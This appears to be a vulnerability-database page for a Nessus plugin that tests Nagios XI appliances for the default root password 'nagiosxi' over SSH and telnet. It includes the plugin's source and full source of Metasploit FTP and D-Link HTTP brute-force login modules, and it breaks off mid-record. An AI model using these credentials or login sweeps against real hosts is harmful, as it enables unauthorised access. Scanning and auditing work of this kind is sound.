Search...

Default Password (nagiosxi) for 'root' Account

2010-10-06T00:00:00

ID ACCOUNT_NAGIOSXI_ROOT.NASL
Type nessus
Reporter This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.
Modified 2022-04-11T00:00:00

Description

It is possible to SSH into the remote Nagios XI virtual machine appliance by providing default credentials. A remote attacker could exploit this to gain complete control of the remote host.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(49773);
  script_version("1.10");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-1999-0502");

  script_name(english:"Default Password (nagiosxi) for 'root' Account");

  script_set_attribute(attribute:"synopsis", value:
"The remote host uses default credentials.");
  script_set_attribute(attribute:"description", value:
"It is possible to SSH into the remote Nagios XI virtual machine
appliance by providing default credentials.  A remote attacker could
exploit this to gain complete control of the remote host.");
  script_set_attribute(attribute:"solution", value:
"Secure the root account with a strong password.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:ND/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:X/RC:X");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'SSH User Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"default_account", value:"true");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Default Unix Accounts");

  script_copyright(english:"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.");

  script_dependencies("find_service1.nasl", "ssh_detect.nasl", "account_check.nasl");
  script_exclude_keys("global_settings/supplied_logins_only");
  script_require_ports("Services/ssh", 22);

  exit(0);
}

include("audit.inc");
include("default_account.inc");
include('global_settings.inc');

account = 'root';
password = 'nagiosxi';

if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);

if (! thorough_tests && ! get_kb_item("Settings/test_all_accounts"))
 exit(0, "Neither thorough_tests nor 'Settings/test_all_accounts' is set.");

affected = FALSE;
ssh_ports = get_service_port_list(svc: "ssh", default:22);
foreach port (ssh_ports)
{
  port = check_account(login:account, password:password, port:port, svc:"ssh");
  if (port)
  {
    affected = TRUE;
    security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());
  }
}
if(affected) exit(0);

telnet_ports = get_service_port_list(svc: "telnet", default:23);
foreach port (telnet_ports)
{
  port = check_account(login:account, password:password, port:port, svc:"telnet");
  if (port)
  {
    affected = TRUE;
    security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());
  }
}
if(!affected) audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "ACCOUNT_NAGIOSXI_ROOT.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Default Password (nagiosxi) for 'root' Account", "description": "It is possible to SSH into the remote Nagios XI virtual machine appliance by providing default credentials. A remote attacker could exploit this to gain complete control of the remote host.", "published": "2010-10-06T00:00:00", "modified": "2022-04-11T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/49773", "reporter": "This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0502"], "cvelist": ["CVE-1999-0502"], "immutableFields": [], "lastseen": "2022-04-12T15:22:14", "viewCount": 4401, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-0502"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/DB2/DB2_AUTH", "MSF:AUXILIARY/SCANNER/FTP/FTP_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/DELL_IDRAC", "MSF:AUXILIARY/SCANNER/HTTP/DLINK_DIR_300_615_HTTP_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/DLINK_DIR_615H_HTTP_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/DLINK_DIR_SESSION_CGI_HTTP_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/HTTP_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/JOOMLA_BRUTEFORCE_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/TOMCAT_MGR_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_XMLRPC_LOGIN", "MSF:AUXILIARY/SCANNER/MYSQL/MYSQL_LOGIN", "MSF:AUXILIARY/SCANNER/NNTP/NNTP_LOGIN", "MSF:AUXILIARY/SCANNER/ORACLE/ORACLE_LOGIN", "MSF:AUXILIARY/SCANNER/PCANYWHERE/PCANYWHERE_LOGIN", "MSF:AUXILIARY/SCANNER/POSTGRES/POSTGRES_LOGIN", "MSF:AUXILIARY/SCANNER/RSERVICES/REXEC_LOGIN", "MSF:AUXILIARY/SCANNER/RSERVICES/RLOGIN_LOGIN", "MSF:AUXILIARY/SCANNER/RSERVICES/RSH_LOGIN", "MSF:AUXILIARY/SCANNER/SSH/SSH_LOGIN", "MSF:AUXILIARY/SCANNER/TELNET/BROCADE_ENABLE_LOGIN", "MSF:AUXILIARY/SCANNER/TELNET/TELNET_LOGIN", "MSF:AUXILIARY/SCANNER/VMWARE/VMAUTHD_LOGIN", "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_HTTP_LOGIN", "MSF:AUXILIARY/SCANNER/WINRM/WINRM_LOGIN", "MSF:EXPLOIT/MULTI/SSH/SSHEXEC"]}, {"type": "nessus", "idList": ["ACCOUNT_4DGIFTS.NASL", "ACCOUNT_666666_666666.NASL", "ACCOUNT_888888_888888.NASL", "ACCOUNT_ADMIN.NASL", "ACCOUNT_ADMIN1_PASSWORD.NASL", "ACCOUNT_ADMINISTRATOR_1234.NASL", "ACCOUNT_ADMINISTRATOR_MEINSM.NASL", "ACCOUNT_ADMIN_1111.NASL", "ACCOUNT_ADMIN_1111111.NASL", "ACCOUNT_ADMIN_1234.NASL", "ACCOUNT_ADMIN_12345.NASL", "ACCOUNT_ADMIN_123456.NASL", "ACCOUNT_ADMIN_4321.NASL", "ACCOUNT_ADMIN_54321.NASL", "ACCOUNT_ADMIN_7UJMKO0ADMIN.NASL", "ACCOUNT_ADMIN_ABC123.NASL", "ACCOUNT_ADMIN_ADMIN.NASL", "ACCOUNT_ADMIN_ADMIN1234.NASL", "ACCOUNT_ADMIN_ADMINIWSS85.NASL", "ACCOUNT_ADMIN_INFOBLOX.NASL", "ACCOUNT_ADMIN_IRONPORT.NASL", "ACCOUNT_ADMIN_MEINSM.NASL", "ACCOUNT_ADMIN_NETOPTICS.NASL", "ACCOUNT_ADMIN_PASS.NASL", "ACCOUNT_ADMIN_PASSW0RD.NASL", "ACCOUNT_ADMIN_PASSWORD.NASL", "ACCOUNT_ADMIN_QWESTM0DEM.NASL", "ACCOUNT_ADMIN_SMCADMIN.NASL", "ACCOUNT_BACKDOOR.NASL", "ACCOUNT_BANK_BANK.NASL", "ACCOUNT_BASH.NASL", "ACCOUNT_CHRONOS_FACEPUNCH.NASL", "ACCOUNT_CLIUSER_CLIUSER.NASL", "ACCOUNT_CMC_LEM.NASL", "ACCOUNT_DATE.NASL", "ACCOUNT_DB2AS_DB2AS.NASL", "ACCOUNT_DB2AS_IBMDB2.NASL", "ACCOUNT_DB2FENC1_DB2FENC1.NASL", "ACCOUNT_DB2FENC1_IBMDB2.NASL", "ACCOUNT_DB2INST1_DB2INST1.NASL", "ACCOUNT_DB2INST1_IBMDB2.NASL", "ACCOUNT_DBADMIN_SQUS3R.NASL", "ACCOUNT_DEBUG_SYNNET.NASL", "ACCOUNT_DEMOS.NASL", "ACCOUNT_EMCUPDATE_PASSWORD.NASL", "ACCOUNT_ENABLEDIAG.NASL", "ACCOUNT_EZSETUP.NASL", "ACCOUNT_FRIDAY.NASL", "ACCOUNT_GAMEZ_LRKR0X.NASL", "ACCOUNT_GLFTPD.NASL", "ACCOUNT_GUEST.NASL", "ACCOUNT_GUEST_12345.NASL", "ACCOUNT_GUEST_GUEST.NASL", "ACCOUNT_HAX0R.NASL", "ACCOUNT_HELP.NASL", "ACCOUNT_HPSUPPORT_BADG3R5.NASL", "ACCOUNT_INFORMIX_INFORMIX.NASL", "ACCOUNT_JACK.NASL", "ACCOUNT_JILL.NASL", "ACCOUNT_LP.NASL", "ACCOUNT_MG3500_MERLIN.NASL", "ACCOUNT_MOBILE_ALPINE.NASL", "ACCOUNT_MOTHER_FUCKER.NASL", "ACCOUNT_MPI.NASL", "ACCOUNT_NASADMIN_NASADMIN.NASL", "ACCOUNT_NEXTHINK_123456.NASL", "ACCOUNT_NSROOT_NSROOT.NASL", "ACCOUNT_OPERATOR_PROFENSE.NASL", "ACCOUNT_ORACLE_ORACLE.NASL", "ACCOUNT_OUTOFBOX.NASL", "ACCOUNT_PATROL_PATROL.NASL", "ACCOUNT_PI_RASPBERRY.NASL", "ACCOUNT_PUBLIC_PUBLIC.NASL", "ACCOUNT_R00T.NASL", "ACCOUNT_REWT_SATORI.NASL", "ACCOUNT_ROOT.NASL", "ACCOUNT_ROOT_00000000.NASL", "ACCOUNT_ROOT_0P3NM35H.NASL", "ACCOUNT_ROOT_1111.NASL", "ACCOUNT_ROOT_1234.NASL", "ACCOUNT_ROOT_12345.NASL", "ACCOUNT_ROOT_123456.NASL", "ACCOUNT_ROOT_2345ASDFG.NASL", "ACCOUNT_ROOT_54321.NASL", "ACCOUNT_ROOT_666666.NASL", "ACCOUNT_ROOT_7UJMKO0ADMIN.NASL", "ACCOUNT_ROOT_7UJMKO0VIZXV.NASL", "ACCOUNT_ROOT_888888.NASL", "ACCOUNT_ROOT_ABC123.NASL", "ACCOUNT_ROOT_ADMIN.NASL", "ACCOUNT_ROOT_ADMINIWSS85.NASL", "ACCOUNT_ROOT_ALIEN.NASL", "ACCOUNT_ROOT_ALPINE.NASL", "ACCOUNT_ROOT_ANKO.NASL", "ACCOUNT_ROOT_ARCSIGHT.NASL", "ACCOUNT_ROOT_ARKEIA.NASL", "ACCOUNT_ROOT_ARTICA.NASL", "ACCOUNT_ROOT_CENTREON.NASL", "ACCOUNT_ROOT_CHANGEMENOW.NASL", "ACCOUNT_ROOT_DASDEC1.NASL", "ACCOUNT_ROOT_DEFAULT.NASL", "ACCOUNT_ROOT_DOTTIE.NASL", "ACCOUNT_ROOT_DREAMBOX.NASL", "ACCOUNT_ROOT_F00BAR.NASL", "ACCOUNT_ROOT_GFORGE.NASL", "ACCOUNT_ROOT_HI3518.NASL", "ACCOUNT_ROOT_IKWB.NASL", "ACCOUNT_ROOT_JUANTECH.NASL", "ACCOUNT_ROOT_JVBZD.NASL", "ACCOUNT_ROOT_KLV123.NASL", "ACCOUNT_ROOT_KLV1234.NASL", "ACCOUNT_ROOT_M.NASL", "ACCOUNT_ROOT_NAS4FREE.NASL", "ACCOUNT_ROOT_NASADMIN.NASL", "ACCOUNT_ROOT_OPENELEC.NASL", "ACCOUNT_ROOT_OPENVPNAS.NASL", "ACCOUNT_ROOT_PASS.NASL", "ACCOUNT_ROOT_PASSWORD.NASL", "ACCOUNT_ROOT_RAIN.NASL", "ACCOUNT_ROOT_RASPI.NASL", "ACCOUNT_ROOT_REALTEK.NASL", "ACCOUNT_ROOT_ROOT.NASL", "ACCOUNT_ROOT_ROOTKIT1.NASL", "ACCOUNT_ROOT_ROOTKIT1BIS.NASL", "ACCOUNT_ROOT_ROOTKIT2.NASL", "ACCOUNT_ROOT_ROOTME.NASL", "ACCOUNT_ROOT_SYSTEM.NASL", "ACCOUNT_ROOT_TANDBERG.NASL", "ACCOUNT_ROOT_TESTPASS123.NASL", "ACCOUNT_ROOT_TOOR.NASL", "ACCOUNT_ROOT_USER.NASL", "ACCOUNT_ROOT_VIZXV.NASL", "ACCOUNT_ROOT_VMWARE.NASL", "ACCOUNT_ROOT_XC3511.NASL", "ACCOUNT_ROOT_XMHDIPC.NASL", "ACCOUNT_ROOT_ZLXX.NASL", "ACCOUNT_ROOT_ZTE521.NASL", "ACCOUNT_SERVICE_SERVICE.NASL", "ACCOUNT_SPLUNKADMIN_CHANGEME.NASL", "ACCOUNT_STOOGR.NASL", "ACCOUNT_SUPERUSER_PASSW0RD.NASL", "ACCOUNT_SUPERVISOR_SUPERVISOR.NASL", "ACCOUNT_SUPER_DEBUG.NASL", "ACCOUNT_SUPER_FORGOT.NASL", "ACCOUNT_SUPPORT_SUPPORT.NASL", "ACCOUNT_SWIFT_SWIFT.NASL", "ACCOUNT_SYNC.NASL", "ACCOUNT_SYSTEM_MANAGER.NASL", "ACCOUNT_TECH_TECH.NASL", "ACCOUNT_TOOR.NASL", "ACCOUNT_TRANS_TRANS.NASL", "ACCOUNT_TUTOR.NASL", "ACCOUNT_UBNT_UBNT.NASL", "ACCOUNT_USER_DEBUG.NASL", "ACCOUNT_USER_FORGOT.NASL", "ACCOUNT_USER_USER.NASL", "ACCOUNT_WANK_WANK.NASL", "DDI_MPEIX_FTP_ACCOUNTS.NASL", "DDI_NETSCAPE_ENTERPRISE_DEFAULT_ADMINISTRATIVE_PASSWORD.NASL", "MACOSX_SERVER_DEFAULT_PASSWORD.NASL", "PIRELLI_ROUTER_DEFAULT_PASSWORD.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:11000", "OPENVAS:1361412562310108586", "OPENVAS:1361412562310108587", "OPENVAS:136141256231011000", "OPENVAS:136141256231011208", "OPENVAS:136141256231012641"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121655", "PACKETSTORM:129674"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:617B5BC20B34DB327AAA03E2FFF1602C"]}, {"type": "saint", "idList": ["SAINT:52580D4C07B9BA6AAB0FDBAF9A895FB0", "SAINT:713447983665FEF2B21EA1044C36B51E", "SAINT:BF189A05AE2FE4C91F81F7C6BF891621", "SAINT:D03628286E2696A69838C01360532538"]}, {"type": "threatpost", "idList": ["THREATPOST:8119266A33EA63A27EBA5260DFF8564D"]}, {"type": "zdt", "idList": ["1337DAY-ID-20781", "1337DAY-ID-23029", "1337DAY-ID-27399"]}], "rev": 4}, "score": {"value": 7.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-1999-0502"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/JOOMLA_BRUTEFORCE_LOGIN"]}, {"type": "nessus", "idList": ["ACCOUNT_CHECK.NASL", "ACCOUNT_LP.NASL", "ACCOUNT_MG3500_MERLIN.NASL", "ACCOUNT_ROOT_ANKO.NASL", "FIND_SERVICE1.NASL", "SSH_DETECT.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231011208"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:617B5BC20B34DB327AAA03E2FFF1602C"]}, {"type": "saint", "idList": ["SAINT:D03628286E2696A69838C01360532538"]}, {"type": "zdt", "idList": ["1337DAY-ID-20781"]}]}, "exploitation": null, "vulnersScore": 7.5}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "pluginID": "49773", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49773);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (nagiosxi) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host uses default credentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to SSH into the remote Nagios XI virtual machine\nappliance by providing default credentials. A remote attacker could\nexploit this to gain complete control of the remote host.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Secure the root account with a strong password.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:X\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude('global_settings.inc');\n\naccount = 'root';\npassword = 'nagiosxi';\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");", "naslFamily": "Default Unix Accounts", "cpe": [], "solution": "Secure the root account with a strong password.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": ["Metasploit(SSH User Code Execution)"]}

{"metasploit": [{"lastseen": "2020-03-03T04:23:21", "description": "This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.\n", "edition": 2, "cvss3": {}, "published": "2011-11-15T06:50:52", "type": "metasploit", "title": "FTP Authentication Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2019-06-27T22:06:32", "id": "MSF:AUXILIARY/SCANNER/FTP/FTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/ftp'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n def proto\n 'ftp'\n end\n\n def initialize\n super(\n 'Name' => 'FTP Authentication Scanner',\n 'Description' => %q{\n This module will test FTP logins on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.\n },\n 'Author' => 'todb',\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::Proxies,\n Opt::RPORT(21),\n OptBool.new('RECORD_GUEST', [ false, \"Record anonymous/guest logins to the database\", false])\n ])\n\n register_advanced_options(\n [\n OptBool.new('SINGLE_SESSION', [ false, 'Disconnect after every login attempt', false])\n ]\n )\n\n deregister_options('FTPUSER','FTPPASS', 'PASSWORD_SPRAY') # Can use these, but should use 'username' and 'password'\n @accepts_all_logins = {}\n end\n\n\n def run_host(ip)\n print_status(\"#{ip}:#{rport} - Starting FTP login sweep\")\n\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n prepended_creds: anonymous_creds\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::FTP.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n connection_timeout: 30,\n framework: framework,\n framework_module: self,\n ssl: datastore['SSL'],\n ssl_version: datastore['SSLVersion'],\n ssl_verify_mode: datastore['SSLVerifyMode'],\n ssl_cipher: datastore['SSLCipher'],\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_data[:private_type] = :password\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n\n print_good \"#{ip}:#{rport} - Login Successful: #{result.credential}\"\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n end\n end\n\n end\n\n\n # Always check for anonymous access by pretending to be a browser.\n def anonymous_creds\n anon_creds = [ ]\n if datastore['RECORD_GUEST']\n ['IEUser@', 'User@', 'mozilla@example.com', 'chrome@example.com' ].each do |password|\n anon_creds << Metasploit::Framework::Credential.new(public: 'anonymous', private: password)\n end\n end\n anon_creds\n end\n\n def test_ftp_access(user,scanner)\n dir = Rex::Text.rand_text_alpha(8)\n write_check = scanner.send_cmd(['MKD', dir], true)\n if write_check and write_check =~ /^2/\n scanner.send_cmd(['RMD',dir], true)\n print_status(\"#{rhost}:#{rport} - User '#{user}' has READ/WRITE access\")\n return 'Read/Write'\n else\n print_status(\"#{rhost}:#{rport} - User '#{user}' has READ access\")\n return 'Read-only'\n end\n end\n\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/ftp_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-09T06:49:47", "description": "This module attempts to authenticate to different D-Link HTTP management services. It has been tested successfully on D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645 Hardware revision A devices. It is possible that this module also works with other models.\n", "edition": 2, "cvss3": {}, "published": "2013-04-04T19:41:10", "type": "metasploit", "title": "D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2017-08-27T01:01:10", "id": "MSF:AUXILIARY/SCANNER/HTTP/DLINK_DIR_SESSION_CGI_HTTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility',\n 'Description' => %q{\n This module attempts to authenticate to different D-Link HTTP management\n services. It has been tested successfully on D-Link DIR-300 Hardware revision B,\n D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645\n Hardware revision A devices. It is possible that this module also works with other\n models.\n },\n 'Author' =>\n [\n 'hdm',\t#http_login module\n 'Michael Messner <devnull[at]s3cur1ty.de>'\t#dlink login included\n ],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('USERNAME', [ false, \"Username for authentication (default: admin)\",\"admin\" ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"http_default_pass.txt\") ]),\n ])\n\n deregister_options('HttpUsername', 'HttpPassword')\n end\n\n def target_url\n proto = \"http\"\n if rport == 443 or ssl\n proto = \"https\"\n end\n \"#{proto}://#{rhost}:#{rport}#{@uri.to_s}\"\n end\n\n def is_dlink?\n response = send_request_cgi({\n 'uri' => @uri,\n 'method' => 'GET'\n })\n\n if response and response.headers['Server'] and response.headers['Server'] =~ /Linux,\\ HTTP\\/1.1,\\ DIR-.*Ver\\ .*/\n return true\n else\n return false\n end\n end\n\n def run_host(ip)\n\n @uri = \"/session.cgi\"\n\n if is_dlink?\n vprint_good(\"#{target_url} - D-Link device detected\")\n else\n vprint_error(\"#{target_url} - D-Link device doesn't detected\")\n return\n end\n\n print_status(\"#{target_url} - Attempting to login\")\n\n each_user_pass { |user, pass|\n do_login(user, pass)\n }\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: (ssl ? 'https' : 'http'),\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n # default to user=admin without password (default on most dlink routers)\n def do_login(user='admin', pass='')\n vprint_status(\"#{target_url} - Trying username:'#{user}' with password:'#{pass}'\")\n\n response = do_http_login(user,pass)\n result = determine_result(response)\n\n if result == :success\n print_good(\"#{target_url} - Successful login '#{user}' : '#{pass}'\")\n\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)\n\n return :next_user\n else\n vprint_error(\"#{target_url} - Failed to login as '#{user}'\")\n return\n end\n end\n\n def do_http_login(user,pass)\n begin\n response = send_request_cgi({\n 'uri' => @uri,\n 'method' => 'POST',\n 'vars_post' => {\n \"REPORT_METHOD\" => \"xml\",\n \"ACTION\" => \"login_plaintext\",\n \"USER\" => user,\n \"PASSWD\" => pass,\n \"CAPTCHA\" => \"\"\n }\n })\n return if response.nil?\n return if (response.code == 404)\n\n return response\n rescue ::Rex::ConnectionError\n vprint_error(\"#{target_url} - Failed to connect to the web server\")\n return nil\n end\n end\n\n def determine_result(response)\n return :abort if response.nil?\n return :abort unless response.kind_of? Rex::Proto::Http::Response\n return :abort unless response.code\n if response.body =~ /\\<RESULT\\>SUCCESS\\<\\/RESULT\\>/\n return :success\n end\n return :fail\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-17T15:44:35", "description": "This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n", "edition": 2, "cvss3": {}, "published": "2010-08-18T00:58:20", "type": "metasploit", "title": "DB2 Authentication Brute Force Utility", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 